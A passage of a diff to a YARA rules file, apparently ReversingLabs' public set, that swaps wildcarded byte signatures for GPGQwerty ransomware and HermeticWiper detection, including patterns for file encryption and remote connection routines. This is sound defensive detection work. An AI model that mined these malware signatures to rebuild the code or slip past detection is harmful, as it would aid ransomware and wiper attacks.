?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 - 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? - FF 15 + $generate_filename_v3 = { + 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 8B F1 8B FA 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? BB ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 8D 85 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B D3 56 50 BE ?? ?? ?? ?? [2-5] 8B CE E8 ?? + ?? ?? ?? 59 FF D0 57 8D 85 ?? ?? ?? ?? 8B D3 50 [2-5] 8B CE E8 ?? ?? ?? ?? 59 FF D0 + 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 + ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 59 FF D0 F7 D8 5F 1B C0 5E 40 5B 8B E5 5D C3 + } + $decrypt_resource_v4 = { + 56 57 8B FA E8 ?? ?? ?? ?? 8B F0 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? + ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 8B 0D ?? ?? ?? ?? + 89 44 B9 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? + 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF D0 8B F8 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? + ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 6A ?? 57 + FF D0 5F 5E C3 + } + $generate_filename_snippet_v4 = { + A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? + ?? ?? ?? A3 ?? ?? ?? ?? 56 53 FF D0 A1 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? E8 ?? + ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 56 FF D0 5F 5E 33 C9 8D + 04 43 66 89 08 5D 5B 59 C3 + } + $decrypt_resource_snippet_v5 = { + C1 EE ?? 33 C0 55 33 ED 8B D3 8D 0C B7 8B F1 2B F7 83 C6 ?? C1 EE ?? 3B F9 0F 47 F0 + 85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 0F B6 C1 66 89 02 8B C1 C1 E8 ?? 8D 52 + ?? 0F B6 C0 66 89 42 ?? C1 E9 ?? 0F B6 C1 C1 E9 ?? 45 66 89 42 ?? 0F B6 C1 66 89 42 + ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 33 C9 5D 66 89 0C 43 5F 5E 8B C3 5B 83 C4 ?? + C3 } - $find_files_2_p1 = { - 8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 - ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F - 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? - ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 - 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 8D - 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 FF D6 - 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 - 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 + $decrypt_resource_snippet_v6 = { + C1 EE ?? 33 C0 55 33 ED 8B D3 8D 0C B7 8B F1 2B F7 83 C6 ?? C1 EE ?? 3B F9 0F 47 F0 + 85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 88 0A 8B C1 C1 E8 ?? 8D 52 ?? C1 E9 ?? + 88 42 ?? 88 4A ?? C1 E9 ?? 45 88 4A ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 5D C6 04 + 03 ?? 5F 5E 8B C3 5B 83 C4 ?? C3 } - $find_files_2_p2 = { - 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 - 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? - ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ?? - ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 4C - 24 ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? - ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 83 4C 24 ?? ?? 83 EC ?? 8B C4 68 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 EC ?? 8D 8C 24 ?? ?? ?? ?? 8B C4 51 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? - 83 C4 ?? 85 C0 75 ?? 32 DB EB ?? B3 ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33 - FF 8D 74 24 ?? E8 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 83 64 24 ?? ?? 6A ?? 33 FF 8D 74 + $liblzf_decompression_1 = { + 83 EC ?? 8B 44 24 ?? 53 55 8D 2C 11 89 4C 24 ?? 8B 54 24 ?? 33 DB 03 C2 89 6C 24 ?? + 56 89 44 24 ?? 0F B6 41 ?? 8D 72 ?? 0F B6 11 C1 E2 ?? 0B D0 8D 45 ?? 89 44 24 ?? 57 + 8B F9 3B C8 0F 83 ?? ?? ?? ?? 0F B6 47 ?? C1 E2 ?? 0B D0 6B C2 ?? 8B CA C1 E9 ?? 33 + CA 89 54 24 ?? 8B 54 24 ?? C1 E9 ?? 2B C8 8B 44 24 ?? 81 E1 ?? ?? ?? ?? 8B 2C 88 8B + C7 2B 44 24 ?? 03 6C 24 ?? 89 04 8A 8B C7 8B 54 24 ?? 2B C5 48 89 44 24 ?? 3D ?? ?? + ?? ?? 0F 8D ?? ?? ?? ?? 3B EA 0F 86 ?? ?? ?? ?? 8A 45 ?? 3A 47 ?? 0F 85 ?? ?? ?? ?? + 0F B6 55 ?? 8D 4F ?? 0F B6 45 ?? 89 4C 24 ?? 0F B6 09 C1 E2 ?? 0B D0 C1 E1 ?? 0F B6 + 07 0B C8 3B D1 0F 85 ?? ?? ?? ?? 8B 44 24 ?? B9 ?? ?? ?? ?? 2B C7 3B C1 6A ?? 0F 47 + C1 89 44 24 ?? 8D 46 ?? 5A 3B 44 24 ?? 72 ?? 33 C9 8B C6 85 DB 0F 94 C1 2B C1 83 C0 + ?? 3B 44 24 ?? 0F 83 ?? ?? ?? ?? 8B C6 8D 4B ?? 2B C3 88 48 ?? 33 C0 85 DB 8B 5C 24 + ?? 0F 94 C0 2B F0 83 FB ?? 0F 86 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? + ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 + ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 } - $find_files_2_p3 = { - 24 ?? E8 ?? ?? ?? ?? 84 DB 0F 85 ?? ?? ?? ?? F6 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? - ?? ?? 50 0F 84 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F0 8B - 46 ?? 59 83 C9 ?? 2B C8 83 F9 ?? 0F 86 ?? ?? ?? ?? 8D 58 ?? 6A ?? 8B C6 E8 ?? ?? ?? - ?? 84 C0 74 ?? 83 7E ?? ?? 8B 4E ?? 72 ?? 8B 06 EB ?? 8B C6 6A ?? 5A 66 89 14 48 83 - 7E ?? ?? 89 5E ?? 72 ?? 8B 06 EB ?? 8B C6 33 C9 66 89 0C 58 8B DE 8D 74 24 ?? E8 ?? - ?? ?? ?? 8B DE 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF E8 ?? ?? ?? ?? 6A ?? 8D 74 24 - ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 44 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 44 - 24 ?? 8B F4 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 44 24 ?? E8 - ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 59 6A ?? 33 FF 8D 74 24 ?? E8 - ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9 8D 74 24 ?? E8 ?? ?? ?? ?? 8D - 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? E8 ?? ?? - ?? ?? 59 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 40 33 C9 - 8D 74 24 ?? E8 + $liblzf_decompression_2 = { + 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 0F 85 ?? ?? ?? ?? 8A 45 ?? 6A ?? 5A 3A + 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 + ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 + ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? + 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8D 0C 3A 2B EF 42 41 3B D3 + 73 ?? 8A 04 29 3A 01 74 ?? 8B 5C 24 ?? 83 EA ?? 83 FA ?? 73 ?? 8B CB 8A C2 C1 F9 ?? + C0 E0 ?? 02 C8 88 0E 46 EB ?? 8B C3 C1 F8 ?? 2C ?? 88 06 8D 42 ?? 88 46 ?? 83 C6 ?? + 8B 7C 24 ?? 8B 44 24 ?? 47 88 1E 03 FA 33 DB 83 C6 ?? 3B F8 72 ?? 8B 6C 24 ?? 8D 46 + ?? 3B 44 24 ?? 76 ?? 33 C0 EB ?? 3B 74 24 ?? 73 ?? 8A 07 43 88 06 46 8B 44 24 ?? 47 + 83 FB ?? 75 ?? C6 46 ?? ?? 33 DB 46 3B F8 73 ?? 8B 54 24 ?? E9 ?? ?? ?? ?? 8A 07 43 + 88 06 46 47 83 FB ?? 75 ?? C6 46 ?? ?? 33 DB 46 3B FD 72 ?? 8B CE 8D 53 ?? 2B CB 88 + 51 ?? 33 C9 85 DB 0F 94 C1 2B F1 2B 74 24 ?? 8B C6 5F 5E 5D 5B 83 C4 ?? C3 } - $encrypt_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 33 F6 C7 43 ?? - ?? ?? ?? ?? 89 73 ?? C6 03 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 57 2B C1 6A ?? 99 5F - F7 FF 89 9D ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 85 C0 74 ?? 89 B5 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 83 EC ?? 03 C1 8B F4 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A - ?? 50 83 C8 ?? 8B F3 E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? - ?? 8B 0D ?? ?? ?? ?? 2B C1 6A ?? 99 5E F7 FE FF 85 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? - 39 85 ?? ?? ?? ?? 72 ?? 8B 53 ?? 6A ?? 5F C6 85 ?? ?? ?? ?? ?? 3B D7 72 ?? 8B 0B EB - ?? 8B CB 8B 43 ?? 03 C1 3B D7 72 ?? 8B 0B EB ?? 8B CB 50 51 8D 85 ?? ?? ?? ?? 50 8D - 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 7B ?? 72 ?? 8B 03 EB ?? 8B C3 8B 5B ?? 8B - B5 ?? ?? ?? ?? 03 D8 53 FF B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B - 4E ?? C6 85 ?? ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ?? - 8B 0E EB ?? 8B CE 50 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 39 7E ?? 72 ?? 8B 0E EB ?? 8B CE 8B 46 ?? 03 C1 50 FF B5 ?? ?? ?? ?? 8D 9D ?? ?? - ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 46 ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4E + $decrypt_resource_snippet_v7 = { + C1 EE ?? 3B F9 0F 47 F0 85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 0F B6 C1 66 89 + 02 8B C1 C1 E8 ?? 8D 52 ?? 0F B6 C0 66 89 42 ?? C1 E9 ?? 0F B6 C1 C1 E9 ?? 45 66 89 + 42 ?? 0F B6 C1 66 89 42 ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 33 C9 5D 66 89 0C 43 + 5F 5E 8B C3 5B 83 C4 ?? C3 } - $encrypt_files_p2 = { - 89 85 ?? ?? ?? ?? 3B CF 72 ?? 8B 16 EB ?? 8B D6 8B 46 ?? 03 C2 3B CF 72 ?? 8B 0E EB - ?? 8B CE 3B C8 74 ?? 8B B5 ?? ?? ?? ?? 2B F1 8A 11 88 14 0E 41 3B C8 75 ?? 8D 45 ?? - 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 75 ?? 8B F8 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 50 8D 45 ?? E8 ?? ?? ?? ?? 8B F0 8B 46 ?? 8B 56 ?? 59 59 8B 4F ?? 2B C2 3B C8 76 ?? - 8B 47 ?? 2B C1 3B C2 72 ?? 56 8B F7 E8 ?? ?? ?? ?? EB ?? 6A ?? 57 83 C8 ?? E8 ?? ?? - ?? ?? 8B D8 8D 75 ?? E8 ?? ?? ?? ?? 8B C6 68 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 78 ?? ?? 59 59 72 ?? 8B 00 33 DB 53 68 ?? ?? ?? ?? 6A ?? 53 53 68 ?? ?? - ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 - ?? ?? ?? ?? 6A ?? 8D 75 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 3B F3 74 ?? 53 53 53 56 - FF 15 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF - 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 59 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + $state_machine_snippet_v7 = { + 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B + 94 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8D 84 24 + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B 54 24 ?? + 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 94 + 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 74 24 + ?? 8B F0 FF B4 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? F7 DE 8B 94 24 ?? ?? ?? ?? 1B F6 + 81 E6 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? + ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 } condition: - uint16(0)==0x5A4D and ( all of ($find_files_1_p*)) and ( all of ($find_files_2_p*)) and ( all of ($enum_resources_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and ($decrypt_resource_v1 and $generate_filename_v1) or ($decrypt_resource_v2 and $generate_filename_v2) or ($decrypt_resource_v3 and $generate_filename_v3) or ($decrypt_resource_v4 and $generate_filename_snippet_v4) or ($decrypt_resource_snippet_v5 and all of ($liblzf_decompression_*)) or ($decrypt_resource_snippet_v6 and all of ($liblzf_decompression_*)) or ($decrypt_resource_snippet_v7 and $state_machine_snippet_v7) } -rule REVERSINGLABS_Win32_Ransomware_Gpgqwerty : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Trojan_Hermeticwiper : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects GPGQwerty ransomware." + description = "Yara rule that detects HermeticWiper trojan." author = "ReversingLabs" - id = "8848e00a-a695-575b-a29d-fc9521859e12" - date = "2020-07-15" - modified = "2020-07-15" + id = "252dfb3d-9d4e-51a4-80c9-64e17922d997" + date = "2022-02-24" + modified = "2022-02-24" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.GPGQwerty.yara#L1-L83" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e59adadd66b4d242ac7337ce4b3c3ec6c60724f4cf5b86305f1e31b88745928c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/trojan/Win32.Trojan.HermeticWiper.yara#L1-L50" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0fa519ce8285ffe4e49c2a301e8a0fd0516a05dc6b41ee0b010fdc76dd6e195e" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "GPGQwerty" + tc_detection_type = "Trojan" + tc_detection_name = "HermeticWiper" tc_detection_factor = 5 importance = 25 strings: - $find_files_p1 = { - 56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC - ?? 83 F8 ?? 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ?? 31 C0 EB ?? 0F B7 43 ?? 83 C0 ?? - 66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44 04 ?? 84 C0 88 01 75 ?? 8B 44 24 - ?? 24 ?? 83 F8 ?? 76 ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 66 90 - 89 43 ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 E8 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ?? 83 F8 - ?? 89 03 74 ?? E8 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ?? - E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ?? - ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? 90 56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04 - 24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ?? - 31 C0 EB ?? 0F B7 43 ?? 83 C0 ?? 66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44 - 04 ?? 84 C0 88 01 75 ?? 8B 44 24 ?? 24 ?? 83 F8 ?? 77 ?? 89 43 ?? 81 C4 ?? ?? ?? ?? - 89 F0 5B 5E C3 8D B4 26 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B - 5E C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 81 C4 ?? ?? ?? - ?? 89 F0 5B 5E C3 - } - $find_files_p2 = { - 8B 45 ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 95 C0 84 - C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? - ?? 85 C0 74 ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 - C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? - ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84 - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? - ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 83 - C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 - ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? - ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E8 - } - $encrypt_files = { - C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? - C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 - C0 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 - 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 - 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 - ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? - ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 C2 B8 - ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8D 85 ?? 